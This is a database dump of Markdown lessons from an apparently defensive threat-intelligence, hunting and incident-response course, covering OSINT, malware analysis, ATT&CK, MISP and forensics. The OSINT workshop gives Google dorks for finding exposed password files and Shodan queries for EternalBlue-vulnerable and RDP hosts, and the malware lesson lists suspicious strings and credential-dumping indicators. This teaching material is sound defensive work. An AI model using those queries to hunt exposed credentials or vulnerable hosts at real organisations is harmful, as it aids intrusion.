(983, 770, '## Infrastructure OSINT\n\nAdversaries need infrastructure to attack you. They need Domains for Phishing and IPs for Command & Control (C2). By analyzing this infrastructure, we can pivot and find more of their network.\n\n---\n\n### 1. WHOIS Data\nWHOIS is the registration record for a domain. It tells you:\n*   **Registrar**: GoDaddy, Namecheap, etc.\n*   **Dates**: Creation Date (New domains are suspicious!), Expiry Date.\n*   **Registrant**: Name, Email, Phone.\n*   **Name Servers**: `ns1.hosting.com`.\n\n> ⚠️ **The GDPR Problem**: Since 2018 (GDPR), most personal WHOIS data is \"Redacted for Privacy\". However, historical WHOIS services (like Whoxy or various paid tools) often cached the record *before* it was redacted.\n\n### 2. DNS Enumeration\nDNS is the phonebook of the internet. We want to find every subdomain associated with a target.\n*   **A Record**: Maps `domain.com` -> `1.2.3.4` (IPv4).\n*   **CNAME Record**: Alias. `blog.target.com` -> `wordpress.com`.\n*   **MX Record**: Mail Exchange. Tells you who hosts their email (e.g., `protection.outlook.com` means they use Microsoft 365).\n*   **TXT Record**: Often reveals trust relationships. `include:sending.service.com` in SPF records tells you they use that vendor for marketing emails.\n\n### 3. Certificate Transparency (CT)\nThis is a goldmine for OSINT.\nWhen a Certificate Authority (like Let\'s Encrypt) issues an SSL/TLS certificate, they MUST publish it to a public **Certificate Transparency Log**.\n*   **Why it helps**: If an attacker sets up `phishing.target-login.com` and gets an SSL cert to make it \"secure\", that hostname appears in the public CT logs **immediately**.\n*   **Tool**: `crt.sh`. Just search `%target.com` to see every sub-domain they have ever secured.\n\n### Pivot Techniques\n*   **Reverse DNS**: \"What other domains are hosted on this IP?\" (Shared hosting vs Dedicated C2).\n*   **Reverse Analytics**: \"What other websites share this Google Analytics ID?\" (Links attacker sites together).\n*   **Reverse WHOIS**: \"Show me all domains registered by `badguy@evil.com`.\"', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:43:25'),
(984, 771, '## Social Media Intelligence (SOCMINT)\n\nPeople are the weakest link. They overshare. SOCMINT exploits this to gather intelligence on targets (employees) or threats (hackers).\n\n---\n\n### Key Platforms\n1.  **LinkedIn**: The #1 source for corporate recon.\n    *   *Attacker View*: \"I need to phish the SysAdmin. I\'ll search LinkedIn for `System Administrator` at `Target Company`. Oh, here is Bob. Bob lists `Cisco ASA` in his skills. Now I know they use Cisco firewalls.\"\n2.  **Twitter / X**: Real-time news ticker.\n    *   Security researchers post 0-days here first.\n    *   Hacktivists announce DDoS attacks here.\n    *   *Search*: `(from:user) until:2023-01-01` (Time travel).\n3.  **Telegram**: The modern \"Dark Web\".\n    *   Ransomware groups run public \"News Channels\" to name-and-shame victims.\n    *   Cybercrime markets sell access and tools in group chats.\n\n### Username Enumeration\nWe are creatures of habit. If my handle is `hacker_123` on Reddit, it is probably `hacker_123` on GitHub and Instagram.\n*   **Concept**: Identity Resolution. Connecting a digital persona across different platforms to build a full profile.\n*   **Tool**: **Sherlock** or **WhatsMyName**. These scripts query hundreds of websites: \"Does `user/hacker_123` exist?\"\n\n### HUMINT (Human Intelligence)\nIn the digital world, this means interacting with people to get info.\n*   **Scenario**: An analyst joins a discord server for a hacking tool and asks \"Does this allow persistence?\" to understand its capabilities.\n*   **Risk**: **Extreme**. Interacting with threat actors can legally verify them, tip them off, or violate specific laws (like providing material support if you buy something).\n*   **Policy**: Most SOCs have a strict \"Passive Only\" policy. You can watch, but you cannot talk.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:43:25'),
(985, 772, '## OSINT Tools Workshop\n\nLet\'s get hands-on with the essential toolkit.\n\n### 1. Google Dorking\nUsing advanced search operators to uncover hidden data.\n*   `site:`: Limit results to a domain.\n*   `filetype:`: Look for specific files (pdf, docx, xlsx).\n*   `inurl:`: Look for text in the URL.\n*   `intitle:`: Look for text in the page title.\n\n**recipes**:\n*   *Find Sensitive Files*: `site:target.com filetype:xlsx \"password\"`\n*   *Find Login Portals*: `site:target.com inurl:login`\n*   *Find Open Directories*: `intitle:\"index of /\" \"parent directory\"`\n*   *Public Trello Boards*: `site:trello.com \"password\" OR \"credentials\"`\n\n### 2. Shodan.io\n\"Google for the Internet of Things\". It scans the entire internet (IPv4) 24/7.\n*   **Webcam**: `Server: SQ-WEBCAM`\n*   **Industrial Control Systems**: `port:502` (Modbus)\n*   **RDP (Remote Desktop)**: `port:3389`\n*   **Vulnerability**: `vuln:CVE-2017-0144` (Finds EternalBlue vulnerable hosts).\n*   **Filter**: `org:\"Target Corp\" port:443`\n\n### 3. Maltego\nA link analysis tool used to visualize relationships.\n*   **Input**: A domain (e.g., `google.com`).\n*   **Transform**: A script that runs on the input (e.g., \"To MX Record\").\n*   **Output**: The mail server node.\n*   **Use Case**: Mapping an entire criminal infrastructure from a single email address.\n\n### 4. The Wayback Machine (Archive.org)\nThe internet never forgets.\n*   **Defacement**: See if a site was hacked in the past.\n*   **Job Posts**: Find old job descriptions listing specific software versions that are now vulnerable.\n*   **Deleted Code**: Developers often post secrets (API Keys) to Pastebin or Github and then delete them. Archive sites might catch them.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:43:25'),
(986, 773, '## Module 2 Assessment\nPass this quiz to complete the module.', 'markdown', NULL, '2025-12-29 13:30:45', '2025-12-29 13:30:45'),
(987, 774, '## Introduction to Malware Analysis\n\nMalware Analysis is the study of malicious software. Our goal is to understand:\n1.  **Capability**: What can this malware do? (Steal passwords? Encrypt files?).\n2.  **Indicators**: How can we detect it? (Files created, network traffic).\n3.  **Attribution**: Who wrote it? (Rarely successful, but possible).\n\n---\n\n### Static Analysis (Safe & Fast)\nAnalyzing the file **without executing it**. It is like looking at a bomb through an X-ray machine.\n*   **Pros**: Safe. Fast. Can analyze \"dead\" malware (C2 is offline).\n*   **Cons**: Modern malware is \"packed\" (obfuscated) and hides its secrets until runtime.\n*   **Techniques**:\n    *   File Hashing (Fingerprinting).\n    *   Strings Analysis (Finding text).\n    *   PE Header Analysis (Import Table - what DLLs does it need?).\n\n### Dynamic Analysis (Risky & Detailed)\n**Running** the malware in a controlled environment (Sandbox) to watch it explode.\n*   **Pros**: Shows true behavior. Unpacks itself automatically.\n*   **Cons**: Risk of infection/escape. Some malware detects the sandbox and \"plays dead\" (Anti-VM techniques).\n*   **Techniques**:\n    *   Process Monitoring (ProcMon).\n    *   Network Sniffing (Wireshark/Fiddler).\n    *   Registry Watchers.\n\n### The Golden Rule\n**NEVER** analyze malware on your host machine.\n**ALWAYS** use an isolated Virtual Machine (VM) with no shared folders and (preferably) a routed network interface that simulates the internet (like INetSim).', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:43:25'),
(988, 775, '## Key Indicators: Strings & Hashes\n\nThis is \"Basic Static Analysis\". It takes 5 minutes and solves 50% of cases.\n\n### 1. File Hashing\nA hash is a one-way mathematical fingerprint changes. If you change 1 bit of the file, the hash changes completely.\n*   **MD5**: 32 chars. Fast. Broken (Collisions possible). OK for database lookups.\n*   **SHA-256**: 64 chars. Standard. Unique.\n*   **Workflow**:\n    1.  Get Sample.\n    2.  `sha256sum malware.exe`.\n    3.  Paste hash into **VirusTotal.com**.\n    4.  If 50/70 vendors say \"Malicious\", you are done.\n\n### 2. Strings Analysis\nProgrammers leave text in code: URLs, IP addresses, Error Messages, Passwords.\nThe `strings` command extracts all ASCII and Unicode readable text.\n*   **Suspicious Strings**:\n    *   `CreateRemoteThread` (Used for Injection).\n    *   `URLDownloadToFile` (Dropper behavior).\n    *   `192.168.x.x` (Internal IPs).\n    *   `cmd.exe /c` (Command execution).\n    *   `C:UsersTarget...` (PDB Paths showing the author\'s username!).\n\n### 3. Packing & Entropy\nMalware authors \"Pack\" their code (like a ZIP file) to hide these strings from antivirus.\n*   **Entropy**: Randomness.\n*   **Low Entropy**: Standard English text (lots of repeated patterns like \"the\").\n*   **High Entropy**: Encrypted or Compressed data (looks like random noise).\n*   **Detection**: If a file has Entropy > 7.0 (out of 8), it is likely Packed. You won\'t see any strings until you unpack it.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:43:25'),
(989, 776, '## Module 3 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(990, 777, '## Indicators: IOCs vs IOAs\n\nIn Cyber Threat Intelligence, an **Indicator** is a piece of information that suggests a potential compromise or attack. But not all indicators are created equal.\n\n### 1. Indicators of Compromise (IOC)\nEvidence that a breach has **already occurred**. These are static artifacts.\n*   **The \"Forensic\" Approach**.\n*   **Examples**:\n    *   **MD5 Hash**: `a1b2c3d4...` (A known malware file).\n    *   **IP Address**: `192.168.1.5` (A known C2 server).\n    *   **Domain**: `update-microsoft-support.com` (A phishing site).\n*   **Use Case**: You load these into your Firewall/EDR to **Block** bad things.\n*   **Weakness**: They are easy to change. An attacker can change a file hash in 1 second by adding a null byte.\n\n### 2. Indicators of Attack (IOA)\nEvidence of the **intent** or **behavior** of an attack in progress.\n*   **The \"Real-time\" Approach**.\n*   **Examples**:\n    *   **Lateral Movement**: A user logging into 50 servers in 1 minute.\n    *   **Credential Dumping**: Accessing the `lsass.exe` process memory.\n    *   **Persistence**: Creating a Scheduled Task named \"Updater\" that runs a script in `C:Temp`.\n*   **Use Case**: You write behavioral rules (SIEM/EDR) to detect the *technique*, not the specific file.\n*   **Strength**: Behaviors are hard to change. If an attacker wants to dump credentials, they *must* touch memory somehow.\n\n---\n\n### The Pyramid of Pain\nCreated by David Bianco, this concept illustrates how much pain you cause the adversary when you deny them each indicator type.\n\n1.  **Hash Values (Trivial)**: Attacker just recompiles. NO PAIN.\n2.  **IP Addresses (Easy)**: Attacker rents a new VPS. LOW PAIN.\n3.  **Domain Names (Simple)**: Attacker registers a new domain. LOW PAIN.\n4.  **Network / Host Artifacts (Annoying)**: e.g., \"User Agent String\". Attacker must recode their tool. MEDIUM PAIN.\n5.  **Tools (Challenging)**: e.g., \"Mimikatz\". If you detect the *tool*, they must write a new one. HIGH PAIN.\n6.  **TTPs (Tough!)**: Tactics, Techniques, and Procedures. If you detect *how* they behave (e.g., \"Pass the Hash\"), they have to relearn how to hack. **MAXIMUM PAIN**.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(991, 778, '## Traffic Light Protocol (TLP)\n\nIntelligence is useless if not shared, but dangerous if shared too widely. The **Traffic Light Protocol (TLP)** is the global standard for defining \"Who can see this?\"\n\nIt was updated to TLP 2.0 in 2022.\n\n---\n\n### TLP Levels\n\n#### 🔴 TLP:RED (For Your Eyes Only)\n*   **Definition**: Not for disclosure, restricted to participants only.\n*   **Scenario**: A partner sends you a list of compromised employees involved in an internal investigation.\n*   **Action**: You cannot share this with *anyone* outside the specific meeting/email thread. Not even your boss, unless they were named.\n\n#### 🟠 TLP:AMBER (Limited Disclosure)\n*   **Definition**: Limited disclosure, recipients can only spread this on a need-to-know basis within their organization and its clients.\n*   **Scenario**: A vendor tells you about a vulnerability in their software that is actively exploited but no patch exists yet.\n*   **Action**: You can tell your System Admins to block the port. You CANNOT write a blog post about it.\n*   **TLP:AMBER+STRICT**: New in 2.0. Means \"Organization Only\" (No clients).\n\n#### 🟢 TLP:GREEN (Community Wide)\n*   **Definition**: Limited disclosure, restricted to the community.\n*   **Scenario**: An industry ISAC (e.g., Financial-ISAC) shares a list of Phishing domains targeting banks.\n*   **Action**: You can share this with partner organizations and peers. You CANNOT publish it on public Twitter.\n\n#### ⚪ TLP:CLEAR (Public)\n*   **Definition**: Subject to standard copyright rules, otherwise unrestricted.\n*   **Scenario**: A published whitepaper on APT29.\n*   **Action**: Post it on LinkedIn, print it, shout it from the rooftops.\n\n---\n\n### Sharing Standards: STIX & TAXII\nHow do we share this data technically?\n\n1.  **STIX (Structured Threat Information Expression)**: The **Language**.\n    *   It is a JSON format.\n    *   It defines objects like `Attack Pattern`, `Identity`, `Malware`, `Indicator`.\n2.  **TAXII (Trusted Automated eXchange of Intelligence Information)**: The **Transport**.\n    *   It is the API (HTTPS) that carries the STIX packages.\n    *   Think of STIX as the package and TAXII as the delivery truck.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(992, 779, '## Module 4 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(993, 780, '## MITRE ATT&CK Framework\n\n**Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK)**.\nIt is the periodic table of hacker behavior. It moves us away from \"My antivirus blocked a virus\" to \"The adversary used **T1059.001 (PowerShell)** to execute code.\"\n\n### The Hierarchy\n1.  **Tactics (The Goal - \"Why\")**: The column headers. There are 14 tactics.\n    *   *Examples*: Initial Access, execution, Persistence, Privilege Escalation, Command and Control.\n2.  **Techniques (The Method - \"How\")**: The cells in the column.\n    *   *Example*: Under \"Initial Access\", you have \"Phishing\" (T1566) and \"Exploit Public-Facing Application\" (T1190).\n3.  **Procedures (The Implementation - \"Specifics\")**: The exact command or tool used.\n    *   *Example*: \"APT33 sent a spearphishing email with a malicious HTA file.\"\n\n### Deep Dive: Technique T1059 (Command and Scripting Interpreter)\nThis is one of the most common techniques.\n*   **Sub-Techniques**:\n    *   `.001 PowerShell`: Windows native automation tool. Loved by hackers because it is installed everywhere.\n    *   `.004 Unix Shell`: Bash/Zsh on Linux/Mac.\n*   **Detection**: You cannot just \"Block PowerShell\". You must look for *malicious use* of PowerShell (e.g., Encoded Commands, Downloads).\n\n### Why use ATT&CK?\n1.  **Common Language**: Red Team says \"I validated T1059\". Blue Team says \"I detected T1059\". Executive says \"We are protected against Scripting attacks\".\n2.  **Gap Analysis**: You can map your defenses against the matrix. \"We have great coverage for Malware (Execution) but zero coverage for Exfiltration\".', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(994, 781, '## MITRE ATT&CK Navigator\n\nThe **Navigator** is an open-source web tool tailored for annotating and visualizing the ATT&CK Matrix. It allows you to create \"Layers\".\n\n### Use Case 1: Threat Profiling\nScenario: You work for a Bank. You are worried about the \"Carbanak\" group.\n1.  Open Navigator.\n2.  Select \"Carbanak\" from the Threat Actor list.\n3.  The tool highlights every technique Carbanak has used in red.\n**Result**: A visual map of your enemy\'s playbook.\n\n### Use Case 2: Defensive Coverage Map\n1.  Create a new Layer.\n2.  Ask your SIEM engineers: \"Can we detect PowerShell?\" (Yes -> Color Green). \"Can we detect Exfiltration over USB?\" (No -> Color Red).\n3.  Fill in the matrix based on your actual capabilities.\n**Result**: A \"You Are Here\" map of your security posture.\n\n### Use Case 3: Overlay (The Gap Analysis)\n1.  Take the **Threat Layer** (Red).\n2.  Take the **Defense Layer** (Green).\n3.  Combine them.\n4.  **The Panic Zone**: Any technique that is colored Red (Threat uses it) but NOT Green (Defense covers it).\n**Result**: This is your immediate roadmap. \"We need to build detections for T1059 because Carbanak uses it and we can\'t see it.\"', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(995, 782, '## Module 5 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(996, 783, '## Introduction to Threat Hunting\n\n**Threat Hunting** is the process of proactively and iteratively searching through networks to detect and isolate advanced threats that avoid existing security solutions.\n\n### The \"Assume Breach\" Paradigm\nTraditional security assumes \"We are safe until the alarm rings.\"\nHunting assumes **\"We are already compromised, we just haven\'t found it yet.\"**\n\n### Types of Hunts\n1.  **Hypothesis Driven**: The scientific method.\n    *   *Hypothesis*: \"Attackers are traversing our network using `PsExec`.\"\n    *   *Test*: Search logs for Event ID 7045 (Service Install) matching PsExec patterns.\n2.  **Intelligence Driven**: Based on a new report.\n    *   *Input*: \"CISA releases report on Volt Typhoon using living-off-the-land binaries.\"\n    *   *Hunt*: Search for the specific behaviors mentioned in the report.\n3.  **Analytics Driven**: Using Math/ML.\n    *   *Input*: \"Show me any user who logged into more than 10 machines in 1 hour.\" (Outlier detection).\n\n### The Hunting Maturity Model (HMM)\n*   **HMM0 (Initial)**: relies primarily on automated alerting. No hunting.\n*   **HMM1 (Minimal)**: Incorporates threat intelligence to drive search.\n*   **HMM2 (Procedural)**: Follows established procedures for hunting. Routine.\n*   **HMM3 (Innovative)**: Creates new hunting methods and automates them.\n*   **HMM4 (Leading)**: Automates the entire process.\n\n### Success Metrics\nHow do you measure a Hunt?\n*   It is **NOT** just \"Finding Bad Guys\". If you hunt for 4 hours and find nothing, that is a success! You proved the network is clean of that specific threat.\n*   **Goal**: Improve Visibility. If you tried to hunt for `PsExec` and couldn\'t because you didn\'t have the right logs, the \"Success\" is identifying that logging gap.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(997, 784, '## Hunting Techniques: Stacking & Clustering\n\nWhen you have 100 Million log events, you can\'t read them all. You need data science techniques to find the needle in the haystack.\n\n### 1. Stacking (Frequency Analysis)\nAlso known as \"Least Frequency Analysis\".\n**Concept**: In a large network, \"Normal\" behaves the same way. \"Evil\" stands out because it is rare.\n\n**Scenario**:\nYou export the \"User Agent\" string from all web traffic in your company.\n1.  **Mozilla/5.0... (Chrome)**: 50,000 counts. (Normal employees).\n2.  **Mozilla/5.0... (Edge)**: 30,000 counts. (Normal employees).\n3.  ...\n4.  **Updates.exe**: 500 counts. (Windows Update).\n5.  **Python-urllib/3.8**: 2 counts. (**Suspicious!**)\n6.  **Kali-Linux**: 1 count. (**Malicious!**).\n\nYou ignore the \"Short Stack\" (High frequency) and investigate the \"Long Tail\" (Low frequency).\n\n### 2. Clustering\nGrouping data points by shared characteristics to find patterns.\n*   **Example**: Grouping all \"svchost.exe\" processes.\n    *   We know `svchost.exe` should usually be spawned by `services.exe`.\n    *   If we cluster by \"Parent Process\", we might see:\n        *   Cluster A: Parent = `services.exe` (Count: 9000).\n        *   Cluster B: Parent = `explorer.exe` (Count: 1). **MALICIOUS**. Services do not run from explorer.\n\n### 3. Box Plotting (Outliers)\nVisualizing data to see who is outside the norm.\n*   \"Average Data Upload per User per Day\": 50MB.\n*   \"User Bob\": 50GB.\nBob is an outlier. He is either backing up his PC or exfiltrating data.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:45:36'),
(998, 785, '## Module 6 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(999, 786, '## Threat Intelligence Platform (TIP)\n\nA **TIP** is the heart of a CTI program. It is where you aggregate, analyze, and disseminate intelligence. Without a TIP, you are just managing Spreadsheets of Death.\n\n### Core Functions of a TIP\n\n#### 1. Maximum Aggregation\nYou have 50 sources of intel:\n*   Paid Feeds (CrowdStrike, Mandiant).\n*   Open Source Feeds (AlienVault OTX, Abuse.ch).\n*   ISAC Emails (Financial-ISAC).\n*   Twitter APIs.\nA TIP sucks all of these in automatically via API.\n\n#### 2. Normalization & Deduplication\nIf CrowdStrike reports `IP: 1.2.3.4` as \"Cobalt Strike\" and AlienVault reports `IP: 1.2.3.4` as \"Scanning\", you don\'t want two rows in your database.\nThe TIP merges these into one \"Object\" with two \"tags\".\n\n#### 3. Enrichment (Context)\nWhen an indicator arrives, the TIP asks questions automatically:\n*   **VirusTotal**: \"What is the detection ratio?\"\n*   **Whois**: \"When was this domain registered?\"\n*   **Passive DNS**: \"What domains resolved to this IP in the past?\"\nThis saves the analyst 20 minutes of manual searching per indicator.\n\n#### 4. Dissemination (Integration)\nThe most important part.\n*   **SIEM**: Push High Confidence IOCs to Splunk for detection.\n*   **Firewall**: Push High Confidence IPs to the Edge Firewall for blocking.\n*   **SOAR**: Trigger a playbook to scan endpoints for a file hash.\n\n---\n\n### The TIP Ecosystem\nThe TIP sits in the middle.\n*   **Input**: Feeds -> TIP\n*   **Output**: TIP -> SIEM / Firewall / EDR.\n\n> 💡 **Pro Tip**: Never push \"Raw Feed\" data directly to a Firewall. You block Google DNS by mistake once, and you lose your job. Always filter through a TIP first.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:47:47'),
(1000, 787, '## MISP (Malware Information Sharing Platform)\n\n**MISP** is the de-facto standard for sharing threat intelligence. It is free, open source, and used by NATO, Governments, and 6,000+ organizations.\n\n### The MISP Data Model\nUnderstanding MISP requires understanding its hierarchy:\n\n1.  **Event**: The \"Folder\".\n    *   *Example*: \"Emotet Phishing Campaign - Dec 2024\".\n    *   Contains metadata: Date, Org, TLP Level.\n2.  **Attribute**: The \"File\".\n    *   *Example*: `192.168.1.1` (ip-dst), `malware.exe` (filename).\n    *   **IDS Flag**: If checked, this attribute is exported to NIDS/SIEM.\n3.  **Object**: A template for complex data.\n    *   *Example*: A \"File\" object links `filename`, `md5`, `sha1`, and `size` together so context isn\'t lost.\n4.  **Galaxy (Tags)**: High level context.\n    *   *Threat Actor*: \"APT29\".\n    *   *Mitre technique*: \"T1566 - Phishing\".\n\n### The Sharing Graph\nMISP instances synchronize.\n*   **Pull**: You connect to `CIRCL.lu` (The main European node) and download 50,000 events.\n*   **Push**: You create an event about a new threat and \"Publish\" it. It replicates to all your partners instantly.\n*   **Filter**: You can say \"Pull everything EXCEPT events marked TLP:RED.\"\n\n### Why use MISP?\n*   **Cost**: Free.\n*   **Community**: It is where the community lives.\n*   **Formats**: Exports to STIX, CSV, Snort, Suricata, Bro/Zeek automatically.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:47:47'),
(1001, 788, '## Module 7 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(1002, 789, '## Writing Effective Intelligence Reports\n\nThe best analysis in the world is worthless if the report is confusing.\n\n### 1. The BLUF (Bottom Line Up Front)\nExecutives do not read mystery novels. They want the spoiler on page 1.\n*   **Structure**: State the **Key Judgment** and **Recommendation** in the first paragraph.\n*   *Example*:\n    > **Executive Summary**: We assess with High Confidence that the \"Finance-Payroll\" server is compromised by Ransomware. We recommend immediate network isolation of the entire Finance subnet to prevent spread.\n\n### 2. Words of Estimative Probability (WEP)\nNever use vague words like \"Maybe\", \"Possibly\", or \"Might\". They mean different things to different people.\nStandardize your language (based on Intelligence Community Directives - ICD 203):\n\n| Term | Probability | Meaning |\n|---|---|---|\n| **Almost Certain** | 90-99% | No doubt. Strong evidence. |\n| **Likely / Probable** | 60-90% | Logical, supported by evidence, but gaps exist. |\n| **Roughly Even Chance** | 40-60% | Could go either way. Ambiguous evidence. |\n| **Unlikely** | 10-40% | Evidence suggests this is not the case. |\n| **Remote** | < 10% | Highly improbable. |\n\n*   *Bad*: \"It might be Russia.\"\n*   *Good*: \"We assess with **Moderate Confidence** that the actor is Russian-aligned.\"\n\n### 3. Audience Analysis\nWrite for the reader, not for yourself.\n*   **Strategic Report (CISO/Board)**:\n    *   **Focus**: Impact, Cost, Risk, Trends.\n    *   **Language**: Business English. No \"Hash values\" or \"IPs\".\n    *   **Length**: 1 Page max.\n*   **Operational Report (SOC Manager)**:\n    *   **Focus**: TTPs, Attribution, Campaign timeline.\n    *   **Language**: Technical but explained.\n*   **Tactical Report (Analyst/Engineer)**:\n    *   **Focus**: IOCs, Signatures, Rules.\n    *   **Language**: Raw Data (JSON/CSV). \"Just give me the list.\"\n\n### 4. Analysis vs Facts\nClearly separate **what you know** (Facts) from **what you think** (Assessment).\n*   *Fact*: \"The malware communicates with 1.2.3.4.\"\n*   *Assessment*: \"1.2.3.4 is likely a C2 server.\"\nIf you mix them, you mislead the reader.', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:47:47'),
(1003, 790, '## Module 8 Assessment', 'markdown', NULL, '2025-12-29 13:38:32', '2025-12-29 13:38:32'),
(1004, 791, '# The Incident Response Lifecycle (PICERL)\n\nIn the world of cybersecurity, it\'s not a matter of *if* an organization will be attacked, but *when*. When the inevitable happens, having a structured, repeatable process is the difference between a minor hiccup and a catastrophic data breach. \n\nThe industry standard for this process is defined by NIST (National Institute of Standards and Technology) and SANS. We\'ll be focusing on the widely adopted 6-step SANS PICERL methodology.\n\n## 1. Preparation\nThis is the most critical phase, and ironically, the one that happens *before* an incident occurs. You cannot respond to a fire if you don\'t have fire extinguishers, evacuation plans, and trained personnel.\n\n**Key Activities:**\n*   **Policy & Plan Creation:** Having an official Incident Response Plan (IRP).\n*   **Asset Management:** Knowing what servers, endpoints, and data you are defending.\n*   **Tooling:** Deploying EDR (Endpoint Detection & Response), SIEM, and ensuring logs are actually being collected and retained.\n*   **Team Readiness:** Conducting tabletop exercises (IR drills) and ensuring the SOC team has the right access privileges.\n\n## 2. Identification\nAlso known as Detection. This phase answers the question: \"Are we currently compromised?\"\n\n**Key Activities:**\n*   **Monitoring Alerts:** Reviewing SIEM alerts, IDS/IPS triggers, and EDR warnings.\n*   **Triaging:** Filtering out false positives. If a user tries to log in over VPN 5 times and fails because they forgot their password, it\'s an event. If they succeed on the 100th try from an IP in a high-risk country, it\'s an incident.\n*   **Declaring an Incident:** Officially escalating the event to a security incident so the IR plan can be enacted.\n\n## 3. Containment\nThe bleeding must be stopped. The goal here is to limit the scope and magnitude of the incident. Containment is often split into two phases:\n\n*   **Short-term Containment:** Immediate actions to stop the spread. E.g., isolating an infected laptop from the network, disabling a compromised VPN account, or pulling a server offline.\n*   **Long-term Containment:** Temporary fixes to allow operations to continue while rebuilding the system. E.g., routing traffic through a newly built, clean proxy server.\n\n## 4. Eradication\nOnce the threat is contained, it must be completely removed from the environment.\n\n**Key Activities:**\n*   **Removing Malicious Artifacts:** Deleting malware, reversing unauthorized registry changes, and removing persistence mechanisms (like cron jobs or scheduled tasks created by the attacker).\n*   **Patching the Root Cause:** If the attacker got in via an unpatched Apache Struts vulnerability, that server must be patched right now, otherwise they will just come back.\n\n## 5. Recovery\nBringing systems back into full production mode cautiously and verifying they are no longer compromised.\n\n**Key Activities:**\n*   **Restoring from Backups:** Rebuilding servers from clean, offline backups.\n*   **Credential Resets:** Forcing enterprise-wide password resets if Active Directory was compromised.\n*   **Monitoring Heightened:** Leaving increased monitoring on the affected systems for several weeks to ensure the attacker doesn\'t return.\n\n## 6. Lessons Learned\nOften skipped, but vital. This phase happens 1-2 weeks after the incident is closed.\n\n**Key Activities:**\n*   **Writing the Post-Mortem Report:** Documenting exactly what happened, chronological timeline, and the root cause.\n*   **Process Improvement:** Asking \"What did we do well?\" and \"What went wrong?\". If containment took 4 hours because the SOC didn\'t have access to the firewall firewall console, the policy must be updated to give them access.\n\n---\n### Summary\nMemorize the acronym **PICERL**: Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned. As a DFIR analyst, your job spans across all these phases, heavily focusing on Identification, Containment, and Eradication.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(1005, 792, '# Introduction to Digital Forensics\n\nIf Incident Response is the act of putting out the fire, Digital Forensics is the investigation into how the fire started, who started it, and what was burned.\n\n**Digital Forensics** is the application of scientific investigation applied to digital crimes and attacks. It involves the recovery, investigation, examination, and analysis of material found in digital devices.\n\n## The Goal of Forensics\nWhile Incident Responders just want to get the business back online as fast as possible, Forensic Investigators care about:\n1.  **Truth:** Establishing exactly what occurred.\n2.  **Attribution:** Finding out *who* did it (Internal threat? Nation state? Ransomware gang?).\n3.  **Impact Analysis:** Determining exactly what data was accessed, stolen, or destroyed.\n4.  **Legal Admissibility:** Ensuring the collected evidence holds up in a court of law.\n\n## Major Branches of Digital Forensics\n\n### 1. Computer/Disk Forensics\nThe classic discipline. This involves taking a physical or logical \"image\" (a bit-by-bit exact copy) of a hard drive or SSD.\n*   **What we look for:** Deleted files, browser history, illegal media, timeline of accessed documents, registry modifications.\n*   **Tools:** Autopsy, EnCase, FTK (Forensic Toolkit).\n\n### 2. Memory (RAM) Forensics\nHard drives are slow and persistent. Modern, sophisticated malware often runs entirely in Random Access Memory (RAM) to avoid leaving traces on the hard drive. \n*   **What we look for:** Decrypted passwords, active network connections, injected malicious code, running processes.\n*   **Tools:** Volatility, Rekall.\n\n### 3. Network Forensics\nAnalyzing network traffic to reconstruct events. It\'s often said that \"packets don\'t lie.\" Even if an attacker deletes the logs on a compromised server, the network traffic capturing their activity might still exist.\n*   **What we look for:** Data exfiltration (large uploads), Command and Control (C2) beacons, unencrypted credentials.\n*   **Tools:** Wireshark, Zeek, Suricata, Arkime.\n\n### 4. Mobile Forensics\nSmartphones are essentially highly personal computers. They are often critical in criminal investigations or corporate espionage cases.\n*   **What we look for:** SMS/WhatsApp messages, GPS locations, application usage, call logs.\n*   **Tools:** Cellebrite, Magnet AXIOM.\n\n## The Friction: Speed vs. Preservation\nThere is an inherent conflict between IT/Business Operations and Digital Forensics.\n\n*   **The Business:** \"The server is hacked! Nuke it, format the drive, and restore from backups so we can make money again!\"\n*   **Forensics Analyst:** \"Stop! Don\'t touch the server! Don\'t even power it off! If you reboot it, we lose the RAM! Let me take a 4-hour forensic image first over the network.\"\n\nA mature Incident Response plan balances these two conflicting needs, outlining exactly when a full forensic investigation is required vs. when rapid recovery is prioritized.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
